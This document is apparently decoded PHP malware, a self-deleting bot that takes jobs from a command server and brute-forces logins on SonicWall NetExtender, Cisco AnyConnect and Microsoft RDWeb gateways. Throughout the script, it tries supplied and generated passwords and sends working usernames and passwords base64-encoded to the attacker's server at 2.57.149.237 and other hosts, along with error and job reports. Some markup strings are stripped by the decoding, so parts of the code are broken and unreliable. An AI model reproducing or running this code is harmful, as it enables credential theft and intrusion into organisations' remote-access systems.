/* Decoded by unphp.net */
{$_VERSION} {$phpFP}
";
if (getmypid() === false || !is_int( getmypid() ) ) {
exit("!getmypid");
}
// file_get_contents('http://2.57.149.237/uniq.php?code=START');
function shutdown() {
global $_VERSION;
$lastError = error_get_last();
if (is_null($lastError)) {
return;
}
$errorTypeCode = $lastError['type'];
$exceptions = array(
E_ERROR => "E_ERROR",
E_WARNING => "E_WARNING",
E_PARSE => "E_PARSE",
E_NOTICE => "E_NOTICE",
E_CORE_ERROR => "E_CORE_ERROR",
E_CORE_WARNING => "E_CORE_WARNING",
E_COMPILE_ERROR => "E_COMPILE_ERROR",
E_COMPILE_WARNING => "E_COMPILE_WARNING",
E_USER_ERROR => "E_USER_ERROR",
E_USER_WARNING => "E_USER_WARNING",
E_USER_NOTICE => "E_USER_NOTICE",
E_STRICT => "E_STRICT",
E_RECOVERABLE_ERROR => "E_RECOVERABLE_ERROR",
E_DEPRECATED => "E_DEPRECATED",
E_USER_DEPRECATED => "E_USER_DEPRECATED",
E_ALL => "E_ALL"
);
if (isset($exceptions[$errorTypeCode])) {
$lastError['typeName'] = $exceptions[$errorTypeCode];
}
$lastError['phpversion'] = phpversion();
$lastError['_v'] = $_VERSION;
file_get_contents( 'http://2.57.149.237/collect-errors.php?b=' . base64_encode(json_encode($lastError)) );
}
// register_shutdown_function('shutdown');
set_time_limit(0);
if (!function_exists('curl_init') || !function_exists('curl_setopt')) {
unlink(__FILE__);
exit('!curl_init || curl_setopt');
}
// // file_get_contents('http://2.57.149.237/uniq.php?code=WITH_CURL');
if (!function_exists('random_bytes')) {
function random_bytes($len)
{
$str = '';
for ($i=0; $i < $len; $i++) {
$str .= chr( rand(0, 255) );
}
return $str;
}
}
// simplexml_load_string
if (!function_exists('simplexml_load_string')) {
unlink(__FILE__);
exit('!simplexml_load_string');
}
// // file_get_contents('http://2.57.149.237/uniq.php?code=WITH_SIMPLEXML');
$sysTempDir = sys_get_temp_dir();
if ( empty($sysTempDir) || !file_exists($sysTempDir)) {
$sysTempDir = '/tmp';
}
// check tmp folder
if (!file_exists($sysTempDir)) {
unlink(__FILE__);
exit("sysTempDir($sysTempDir) folder not found");
}
// // file_get_contents('http://2.57.149.237/uniq.php?code=WITH_SYS_TEM_DIR');
// file_get_contents('http://2.57.149.237/uniq.php?code=WITH_VALID_TEST_RESP');
// define countCPUs
$countCPUs = 0;
if (file_exists("/proc/cpuinfo")) {
$tmpData = file_get_contents("/proc/cpuinfo");
$countCPUs = substr_count($tmpData, "cpu MHz");
if ($countCPUs > 192) {
$countCPUs = 192;
}
}
// define maxCountPids
if ($countCPUs < 4) {
$maxCountPids = $countCPUs * 2;
}else{
$maxCountPids = $countCPUs * 10;
}
if ($maxCountPids < 1) {
$maxCountPids = 1;
}
if ($maxCountPids > 240) {
$maxCountPids = 240;
}
// end define maxCountPids
// defaul run proccess
$pids = getPids();
$pids[] = getmypid();
unlink(__FILE__);
if (count($pids) > $maxCountPids ) {
exit("pids too many
");
}
$pidsFP = $sysTempDir . '/jobs-JnfhngkJhgtt.pids';
$b = file_put_contents($pidsFP, json_encode($pids));
if ($b === false) {
exit("Error file_put_contents pidsFP");
}
// end defaul run proccess
// check google
$resp = curl_get_data('/test.php', 1);
$resp = json_decode($resp, true);
if ( !isset($resp['status']) || $resp['status'] !== true) {
unlink(__FILE__);
exit("curl invalid.
");
}
echo "Ok
";
// end check google
// main process
/*
$isMainProccess = true;
if (isset($argv[1])) {
$isMainProccess = false;
}
$pidsFP = $sysTempDir . '/jobs-JnfhngkJhgtt.pids';
if (function_exists('shell_exec')) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_STARTS');
if ($isMainProccess) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_STARTS_MAIN_PROC');
$pidMainProccesFP = $sysTempDir . '/jobs-JnfhngkJhgtt-main.pid';
if (file_exists($pidMainProccesFP)) {
$pidMainProcces = (int) file_get_contents($pidMainProccesFP);
if (file_exists("/proc/{$pidMainProcces}")) {
if (file_exists("/proc/{$pidMainProcces}/cmdline")) {
$cmdline = file_get_contents("/proc/{$pidMainProcces}/cmdline");
if (stripos($cmdline, $phpFP) !== false) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ISSET_main_PROCC2');
exit("Isset main proccess
");
}
}else{
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ISSET_main_PROCC');
exit("Isset main proccess
");
}
}
}
$b = file_put_contents($pidMainProccesFP, getmypid());
if ($b === false) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ERR3');
exit("Error file_put_contents pidMainProccesFP");
}
$pids = getPids();
$countChildsToRun = $maxCountPids - count($pids);
echo "+ countChildsToRun($countChildsToRun) run pids(". count($pids) .")
";
for ($childProcIndex = 0; $childProcIndex < $countChildsToRun; $childProcIndex++) {
$childPid = shell_exec("/usr/local/bin/php {$phpFP} $childProcIndex > /dev/null 2>&1 & echo $!;");
if ($childPid) {
$childPid = (int) trim($childPid);
}
if (is_numeric($childPid) && $childPid > 0) {
$pids[] = $childPid;
echo "> run child($childProcIndex) $childPid
";
$b = file_put_contents($pidsFP, json_encode($pids));
if ($b === false) {
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ERR2');
exit("Error file_put_contents pidsFP");
}
}else{
// file_get_contents('http://2.57.149.237/uniq.php?code=SHELL_EXEC_ERR');
}
sleep( rand(3, 12) );
}
unlink(__FILE__);
exit( "Main proccess done
");
}
}else{
// file_get_contents('http://2.57.149.237/uniq.php?code=shell_exec_NOT_ISSET');
$pids = getPids();
$pids[] = getmypid();
unlink(__FILE__);
if (count($pids) > $maxCountPids ) {
// file_get_contents('http://2.57.149.237/uniq.php?code=MAINPROCEES_PIDS_TOO_MANY');
exit("pids too many
");
}
$b = file_put_contents($pidsFP, json_encode($pids));
if ($b === false) {
exit("Error file_put_contents pidsFP");
}
}
// end main process
// child proccess
if (!$isMainProccess) {
$pids = getPids();
if (count($pids) > $maxCountPids ) {
// file_get_contents('http://2.57.149.237/uniq.php?code=CHILD_PIDS_TOO_MANY');
exit("pids too many
");
}
}
// end child proccess
// file_get_contents('http://2.57.149.237/uniq.php?code=WITH_SUCCESS_RUN_CHILD');
*/
function getPids()
{
global $sysTempDir, $phpFP;
$pidsFP = $sysTempDir . '/jobs-JnfhngkJhgtt.pids';
if (file_exists($pidsFP)) {
$pids = file_get_contents($pidsFP);
$pids = json_decode($pids, true);
if (!is_array($pids)) {
exit("pids empty format.");
}
}else{
$pids = array();
}
foreach($pids as $pidKey => $pid){
if (!is_numeric($pid) || $pid < 1) {
unset($pids[$pidKey]);
continue;
}
if (!file_exists("/proc/{$pid}")) {
unset($pids[$pidKey]);
}else{
if ( file_exists("/proc/{$pid}/cmdline") ){
$cmdline = file_get_contents("/proc/{$pid}/cmdline");
if (stripos($cmdline, $phpFP) === false) {
unset($pids[$pidKey]);
}
}
}
}
if (!is_array($pids)) {
$pids = array();
}
$pids = array_unique($pids);
$pids = array_values($pids);
return $pids;
}
function getInputData($resp)
{
$inputData = array();
$ppStart = 0;
$count = 0;
do{
$count++;
$pp = stripos($resp, '', $pp);
if ($ppEnd === false) {
continue;
}
$inputStr = substr($resp, $pp + 6, $ppEnd - $pp - 6);
// var_dump($inputStr);
$name = getValueBetween($inputStr, 'name="', '"');
$value = getValueBetween($inputStr, 'value="', '"');
if ( !empty($name) ) {
$inputData[$name] = (string) $value;
}
}while($count < 100);
return $inputData;
}
function getValueBetween($str, $from, $to)
{
$pp = strpos($str, $from);
if ($pp === false) {
return false;
}
$pp2 = strpos($str, $to, $pp + strlen($from));
if ($pp2 === false) {
return false;
}
return substr($str, $pp + strlen($from), $pp2 - $pp - strlen($from) );
}
function generate_random_hex($len){
$bytes = random_bytes( ceil($len / 2) );
return bin2hex($bytes);
}
function generate_mac_address(){
$bytes = generate_random_hex(12);
return implode("-", str_split($bytes, 2));
}
function xml_to_arr($xmlstring){
$xml = @simplexml_load_string($xmlstring, "SimpleXMLElement", LIBXML_NOCDATA);
$json = json_encode($xml);
return (array) json_decode($json,TRUE);
}
function getMemInfo()
{
if (file_exists("/proc/meminfo")) {
$meminfo = substr( file_get_contents("/proc/meminfo"), 0, 256 );
$meminfo = explode("
", $meminfo);
$meminfoNew = array();
foreach($meminfo as $meminfoKey => $meminfoVal){
$meminfoValArr = explode(":", $meminfoVal);
if (count($meminfoValArr) != 2) {
continue;
}
$meminfoNewKey = trim($meminfoValArr[0]);
$meminfoNew[$meminfoNewKey] = (int) trim($meminfoValArr[1]);
}
$meminfo = $meminfoNew;
}else{
$meminfo = false;
}
return $meminfo;
}
function get_random_router_ip()
{
global $_ROUTERS;
if (next($_ROUTERS) === false) {
reset($_ROUTERS);
}
return current($_ROUTERS);
}
function curl_get_data($query='', $maxTryes = 5 )
{
global $_ROUTER_MAIN;
$headers = array(
'User-Agent: curl/8.1',
);
if (function_exists('gzdecode')) {
$headers[] = 'Accept-Encoding: gzip';
}
for ($i = 0; $i < $maxTryes; $i++) {
if (stripos($query, '/valid-items.php') === false ) {
$remote_ip = get_random_router_ip();
}else{
$remote_ip = $_ROUTER_MAIN;
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://" . $remote_ip . $query);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$response = curl_exec($ch);
// echo "+ respons(". strlen($response) .")
";
$httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$header = substr($response, 0, $header_size);
$resp = substr($response, $header_size);
curl_close($ch);
if ($response !== false && $httpcode == 200) {
break;
}
}
if ($response === false) {
return false;
}
// unpack data
if (stripos($header, 'Content-Encoding: gzip') !== false) {
return gzdecode($resp);
}else{
return $resp;
}
}
$procVersion = trim(file_get_contents('/proc/version'));
/*
$sleepWhenStartSec = rand(5, 60);
echo "+ sleepWhenStartSec($sleepWhenStartSec)
";
sleep($sleepWhenStartSec);
*/
$countEmptyJobData = 0;
while (true) {
if ($countEmptyJobData >= 10) {
break;
}
/*
$sleepSec = rand(5, 30);
echo "Sleep time: $sleepSec
";
sleep($sleepSec);
*/
$count_pids = count( getPids() );
echo "+ count_pids($count_pids)
";
$meminfo = getMemInfo();
if (isset($meminfo['MemAvailable'])) {
$MemAvailable = $meminfo['MemAvailable'] / 1000;
// check
if ($MemAvailable < 500) {
// file_get_contents('http://2.57.149.237/uniq.php?code=MemAvailable_TOO_SMALL');
exit("MemAvailable too small
");
}
}else{
$MemAvailable = false;
}
$memPeak = memory_get_peak_usage() / 1000000;
// echo "- MemAvailable(". number_format($MemAvailable) ." Mb)
";
// echo "- memPeak(". number_format($memPeak) ." mb)
";
$getItemsUrlData = array(
'version' => $_VERSION,
"countCPUs" => $countCPUs,
"count_pids" => $count_pids,
"phpversion" => (float) phpversion(),
"simplexml_load_string" => function_exists('simplexml_load_string'),
"MemAvailable" => $MemAvailable,
"memPeak" => $memPeak,
"procVersion" => $procVersion,
);
$getItemsTMStart = microtime(true);
$itemsData = curl_get_data( '/get-items.php?b=' . base64_encode(json_encode($getItemsUrlData)), 1 );
$getItemsExecTime = microtime(true) - $getItemsTMStart;
echo "+ getItemsExecTime($getItemsExecTime)
";
echo "+ itemsData(". strlen($itemsData) ." bytes)
";
$itemsData = (array) json_decode($itemsData, true);
if (!empty($itemsData['jd'])) {
$data = $itemsData['jd'];
}else{
$data = false;
}
if ( isset($data['id']) ) {
$countEmptyJobData = 0;
$tmJobStart = microtime(true);
$jobCountProcedPasswds = 0;
$jobSign = $itemsData['js'];
$passwd_offset = $data['po'];
$generated_passwd_offset = (int) $data['gpo'];
$passwds = (array) $itemsData['pp'];
$generatedPasswds = (array) $itemsData['gp'];
$itemDataForBadRequest = array(
'id' => $data['id'],
"jobSign" => $jobSign,
);
echo "+ passwds(". count($passwds) .")
";
echo "+ generatedPasswds(". count($generatedPasswds) .")
";
$server_ip = long2ip($data['si']);
$hasBadResp = false;
$foundValidCreds = false;
// start type 2
if ($data['ti'] == 2 ){
$headers = array(
'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept: */*',
'Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3',
'Pragma: no-cache',
'Cache-Control: no-store, no-cache, must-revalidate',
'If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT',
'Content-Type: text/plain;charset=UTF-8',
'Sec-Fetch-Dest: empty',
'Sec-Fetch-Mode: cors',
'Sec-Fetch-Site: same-origin',
);
$headers_sonic = array(
'User-Agent: SonicWALL NetExtender for Windows 10.2.339 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1) x86_64',
"Client-Name: NetExtender Windows Client",
"Client-Version: 10.2.339",
"X-NE-SESSIONPROMPT: true",
"X-NE-pda: true",
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language: en-us',
// 'Referer: '. $schema_ip .'/cgi-bin/welcome',
'Content-Type: application/x-www-form-urlencoded',
// 'Origin: ' . $schema_ip,
'Connection: keep-alive',
'Upgrade-Insecure-Requests: 1',
);
$ch = curl_init();
$schema_ip = "https://{$server_ip}:{$data['sp']}";
$url = $schema_ip;
echo "~ $url
";
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$resp = curl_exec($ch);
$pageDomains = array();
$tmpDomainsStr = getValueBetween($resp, "name='domain'", "");
if (!empty($tmpDomainsStr)) {
$domainsArr = explode("
", $tmpDomainsStr);
foreach($domainsArr as $domainsArrItem){
if (stripos($domainsArrItem, '') === false
) {
continue;
}
$domainsArrItem = trim($domainsArrItem);
$domainValue = getValueBetween($domainsArrItem, 'value="', '"');
// echo "- $domainValue
";
if ($domainValue) {
$pageDomains[] = $domainValue;
}
}
}
if (empty($pageDomains)) {
// // /api/sonicos/is-sslvpn-enabled
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_URL, "{$schema_ip}/api/sonicos/is-sslvpn-enabled");
$respApi = curl_exec($ch);
$respApi = json_decode($respApi, true);
if (!empty($respApi['domains'])) {
foreach ($respApi['domains'] as $apiDomain) {
$pageDomains[] = $apiDomain['name'];
}
}
}
if (empty($pageDomains)) {
// /__api__/v1/config/domains
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_URL, "{$schema_ip}/__api__/v1/config/domains");
$respApi2 = curl_exec($ch);
$respApi2 = json_decode($respApi2, true);
if (!empty($respApi2)) {
foreach ($respApi2 as $apiDomain) {
$pageDomains[] = $apiDomain['domainName'];
}
}
}
echo "+ pageDomains(". implode(", ", $pageDomains) .")
";
if (empty($pageDomains)) {
curl_close($ch);
echo "Send bad-items
";
echo curl_get_data('/bad-items.php?b=' . base64_encode(json_encode($itemDataForBadRequest)));
continue;
}
$username = $data['u'];
// start gen passwds type 2
foreach($generatedPasswds as $password){
if ($hasBadResp || $foundValidCreds ) break;
foreach($pageDomains as $pageDomain){
if ($hasBadResp || $foundValidCreds ) break;
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_URL, "$schema_ip/cgi-bin/userLogin");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'domain='. urlencode($pageDomain) . '&username='. urlencode($username) .'&password='. urlencode($password) .'&login=true&clientSupportPDA=true');
curl_setopt(
$ch,
CURLOPT_HTTPHEADER,
array_merge(
$headers_sonic,
array(
'Referer: '. $schema_ip .'/cgi-bin/welcome',
)
)
);
$resp = curl_exec($ch);
$isValidAuth = false;
$tfresult = getValueBetween($resp, 'X-NE-tfresult:', "
");
$tfresult = trim($tfresult);
$swap = getValueBetween($resp, 'Set-Cookie: swap=', ";");
$swap = trim($swap);
// echo "+ tmpSessIdStr($tfresult)
";
// echo "+ swap($swap)
";
if ( $swap ) {
$isValidAuth = true;
}
if ($tfresult === false){
$hasBadResp = true;
echo "-- Bad resp
";
}
if ( $isValidAuth ) {
echo "+ OK Auth
";
$validData = array(
'job_id' => $data['id'],
'jobSign' => $jobSign,
"url" => $url,
'username' => $username,
'passwd' => $password,
'pageDomain' => $pageDomain,
);
curl_get_data('/valid-items.php?type=2&b=' . base64_encode(json_encode($validData)));
$foundValidCreds = true;
}else{
echo "+ Error Auth
";
}
} // groups
if (!$hasBadResp) {
$generated_passwd_offset++;
$jobCountProcedPasswds++;
}
}
// end gen passwds type 2
// start passwds type 2
foreach($passwds as $password){
if ($hasBadResp || $foundValidCreds ) break;
foreach($pageDomains as $pageDomain){
if ($hasBadResp || $foundValidCreds ) break;
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_URL, "$schema_ip/cgi-bin/userLogin");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'domain='. urlencode($pageDomain) . '&username='. urlencode($username) .'&password='. urlencode($password) .'&login=true&clientSupportPDA=true');
curl_setopt(
$ch,
CURLOPT_HTTPHEADER,
array_merge(
$headers_sonic,
array(
'Referer: '. $schema_ip .'/cgi-bin/welcome',
)
)
);
$resp = curl_exec($ch);
$isValidAuth = false;
$tfresult = getValueBetween($resp, 'X-NE-tfresult:', "
");
$tfresult = trim($tfresult);
$swap = getValueBetween($resp, 'Set-Cookie: swap=', ";");
$swap = trim($swap);
// echo "+ tmpSessIdStr($tfresult)
";
// echo "+ swap($swap)
";
if ( $swap ) {
$isValidAuth = true;
}
if ($tfresult === false){
$hasBadResp = true;
echo "-- Bad resp
";
}
if ( $isValidAuth ) {
echo "+ OK Auth
";
$validData = array(
'job_id' => $data['id'],
'jobSign' => $jobSign,
"url" => $url,
'username' => $username,
'passwd' => $password,
'pageDomain' => $pageDomain,
);
curl_get_data('/valid-items.php?type=2&b=' . base64_encode(json_encode($validData)));
$foundValidCreds = true;
}else{
echo "+ Error Auth
";
}
} // groups
if (!$hasBadResp) {
$passwd_offset++;
$jobCountProcedPasswds++;
}
}
// end passwds type 2
curl_close($ch);
}
// end type 2
// start type 1
if ($data['ti'] == 1 ){
$headers = array(
"Cache-Control: no-cache",
"Pragma: no-cache",
"User-Agent: AnyConnect Windows 4.4.02039",
"X-Transcend-Version: 1",
"X-Aggregate-Auth: 1",
"X-AnyConnect-Platform: win",
);
$url = "https://{$server_ip}:{$data['sp']}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$xmlIniqueID = strtoupper( generate_random_hex(64) );
$macAddress = generate_mac_address();
$xmlData = '
4.4.02039
win
'. $macAddress .'
RemoteAccess
https://'. $server_ip .'
single-sign-on
multiple-cert
';
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xmlData);
$resp = curl_exec($ch);
$opaque = getValueBetween($resp, '', '');
$formFieldNames = array();
$groupOptions = array();
if ($opaque) {
$opaqueArr = xml_to_arr($resp);
if (empty($opaqueArr['auth']['form'])) {
$opaqueArrForm = array();
}else{
$opaqueArrForm = $opaqueArr['auth']['form'];
}
foreach($opaqueArrForm as $opaqueArrFormItem){
if (isset($opaqueArrFormItem['@attributes'])) {
$fieldsData = array( $opaqueArrFormItem );
}else{
$fieldsData = $opaqueArrFormItem;
}
foreach($fieldsData as $fieldsDataItem){
if (isset( $fieldsDataItem['@attributes']['name'] )) {
$formFieldNames[] = $fieldsDataItem['@attributes']['name'];
}
}
}
echo "- formFieldNames(". implode(", ", $formFieldNames) .")
";
if (count($formFieldNames) != 2
&& count($formFieldNames) != 3
) {
$formFieldNames = array();
}
if (!isset($opaqueArr['auth']['form']['select']['option'])) {
$groupOptions = false;
}else{
$groupOptions = $opaqueArr['auth']['form']['select']['option'];
}
if (!is_array($groupOptions) && is_string($groupOptions)) {
$groupOptions = array( $groupOptions );
}
if ( empty($groupOptions) ) {
echo "- groupOptions empty
";
$groupOptions = array( 'RemoteAccess' );
}
echo "- groupOptions(". implode(", ", $groupOptions) .")
";
}
if (!empty($formFieldNames)
&& !empty($groupOptions)
) {
$username = $data['u'];
// generatedPasswds
foreach($generatedPasswds as $password){
if ($hasBadResp || $foundValidCreds ) break;
foreach($groupOptions as $group){
if ($hasBadResp || $foundValidCreds ) break;
// echo "+ Try $group $username $password
";
$xmlData = '
4.4.02039
win
'. $macAddress .'
'. $opaque .'
'. $password .'
'. $username .'
'. $group .'
';
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xmlData);
$resp = curl_exec($ch);
$respLen = strlen($resp);
$respArr = xml_to_arr($resp);
// var_dump($respArr['auth']['error']);
if ( empty($respArr['auth']) ) {
$hasBadResp = true;
}
if ( !empty($respArr['session-id'])
&& !empty($respArr['session-token'])
) {
echo "+ OK Auth
";
$validData = array(
'job_id' => $data['id'],
'jobSign' => $jobSign,
"url" => $url,
'group' => $group,
'username' => $username,
'passwd' => $password,
);
curl_get_data('/valid-items.php?type=1&b=' . base64_encode(json_encode($validData)));
$foundValidCreds = true;
}else{
echo "+ Error Auth
";
}
} // groups
if (!$hasBadResp) {
$generated_passwd_offset++;
$jobCountProcedPasswds++;
}
}
// end generatedPasswds
foreach($passwds as $password){
if ($hasBadResp || $foundValidCreds ) break;
foreach($groupOptions as $group){
if ($hasBadResp || $foundValidCreds ) break;
// echo "+ Try $group $username $password
";
$xmlData = '
4.4.02039
win
'. $macAddress .'
'. $opaque .'
'. $password .'
'. $username .'
'. $group .'
';
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xmlData);
$resp = curl_exec($ch);
$respLen = strlen($resp);
$respArr = xml_to_arr($resp);
// var_dump($respArr['auth']['error']);
if ( empty($respArr['auth']) ) {
$hasBadResp = true;
}
if ( !empty($respArr['session-id'])
&& !empty($respArr['session-token'])
) {
echo "+ OK Auth
";
$validData = array(
'job_id' => $data['id'],
'jobSign' => $jobSign,
"url" => $url,
'group' => $group,
'username' => $username,
'passwd' => $password,
);
curl_get_data('/valid-items.php?type=1&b=' . base64_encode(json_encode($validData)));
$foundValidCreds = true;
}else{
echo "+ Error Auth
";
}
} // groups
if (!$hasBadResp) {
$passwd_offset++;
$jobCountProcedPasswds++;
}
} // passwds
}else{
curl_close($ch);
echo "Send bad-items
";
echo curl_get_data('/bad-items.php?b=' . base64_encode(json_encode($itemDataForBadRequest)));
continue;
}
curl_close($ch);
}
// end type 1
// start type 0
if ($data['ti'] == 0 ){
$url = "https://{$server_ip}:{$data['sp']}/RDWeb/Pages/";
echo "+ [ID:{$data['id']}] $url
";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
$headers = array(
"Uset-Agent: curl/8.1"
);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$resp = curl_exec($ch);
$baseUrl = getValueBetween($resp, 'baseurl="', '"');
if( empty($baseUrl) ){
curl_close($ch);
echo "baseUrl error
";
curl_get_data('/bad-items.php?b=' . base64_encode(json_encode($itemDataForBadRequest)));
continue;
}
echo "baseUrl = $baseUrl
";
$url = $baseUrl . 'login.aspx';
curl_setopt($ch, CURLOPT_URL, $url);
$inputData = getInputData($resp);
if (empty($inputData['WorkSpaceID'])) {
echo "Empty WorkSpaceID
";
curl_get_data('/bad-items.php?b=' . base64_encode(json_encode($itemDataForBadRequest)));
continue;
}
echo "WorkSpaceID = {$inputData['WorkSpaceID']}
";
$WorkSpaceID = $inputData['WorkSpaceID'];
$WorkSpaceIDDomain = false;
$WorkSpaceIDArr = explode(".", $WorkSpaceID);
if (count($WorkSpaceIDArr) > 2) {
$WorkSpaceIDArrReverse = array_reverse($WorkSpaceIDArr);
$WorkSpaceIDDomain = $WorkSpaceIDArrReverse[1];
}
echo "WorkSpaceIDDomain = $WorkSpaceIDDomain
";
$usernames = array(
$data['u'],
);
$domainGroups = array(
'',
);
if ($WorkSpaceIDDomain) {
$domainGroups[] = $WorkSpaceIDDomain;
}
// generatedPasswds
foreach($generatedPasswds as $passwd){
if ($hasBadResp || $foundValidCreds ) break;
foreach($usernames as $username){
if ($hasBadResp || $foundValidCreds ) break;
$inputDataItem = $inputData;
echo "Try: $username $passwd
";
$inputDataItem['DomainUserName'] = $username;
$inputDataItem['UserPass'] = $passwd;
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $inputDataItem);
$timeStart = microtime(true);
$resp = curl_exec($ch);
$timeEnd = microtime(true);
$execTime = $timeEnd - $timeStart;
$hasBadResp = strlen($resp) < 5000;
if (stripos($resp, '/default.aspx') !== false) {
echo "+ OK
";
$validData = array(
'job_id' => $data['id'],
'jobSign' => $jobSign,
"url" => $url,
'username' => $username,
'passwd' => $passwd,
'username2' => $WorkSpaceIDDomain . '\' . $username,
);
curl_get_data('/valid-items.php?b=' . base64_encode(json_encode($validData)));
$foundValidCreds = true;
}else{
echo "+ Err
";
}
}
if (!$hasBadResp) {
$generated_passwd_offset++;
$jobCountProcedPasswds++;
}
}
// end generatedPasswds
foreach($passwds as $passwd){
if ($hasBadResp || $foundValidCreds ) break;
foreach($usernames as $username){
if ($hasBadResp || $foundValidCreds ) break;
$inputDataItem = $inputData;
// echo "Try: $username $passwd
";
$inputDataItem['DomainUserName'] = $username;
$inputDataItem['UserPass'] = $passwd;
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $inputDataItem);
$timeStart = microtime(true);
$resp = curl_exec($ch);
$timeEnd = microtime(true);
$execTime = $timeEnd - $timeStart;
$hasBadResp = strlen($resp) < 5000;
if (stripos($resp, '/default.aspx') !== false) {
echo "+ OK
";
$validData = array(
'job_id' => $data['id'],
'jobSign' => $jobSign,
"url" => $url,
'username' => $username,
'passwd' => $passwd,
'username2' => $WorkSpaceIDDomain . '\' . $username,
);
curl_get_data('/valid-items.php?b=' . base64_encode(json_encode($validData)));
$foundValidCreds = true;
}else{
echo "+ Err
";
}
}
if (!$hasBadResp) {
$passwd_offset++;
$jobCountProcedPasswds++;
}
}
// passwod loops
curl_close($ch);
} // end type 0
$tmJobEnd = microtime(true);
$tmJobExecTime = $tmJobEnd - $tmJobStart;
$jobProcSpeed = 0;
if ($tmJobExecTime && $jobCountProcedPasswds ) {
$jobProcSpeed = number_format($jobCountProcedPasswds / $tmJobExecTime, 4);
}
$doneData = array(
"version" => $_VERSION,
'id' => $data['id'],
"passwd_offset" => $passwd_offset,
"generated_passwd_offset" => $generated_passwd_offset,
"hasBadResp" => $hasBadResp,
"jobProcSpeed" => $jobProcSpeed,
"foundValidCreds" => $foundValidCreds,
"jobSign" => $jobSign,
);
curl_get_data('/done-check.php?b=' . base64_encode(json_encode($doneData)));
}else{
// empty job data
$countEmptyJobData++;
sleep(30);
continue;
}
}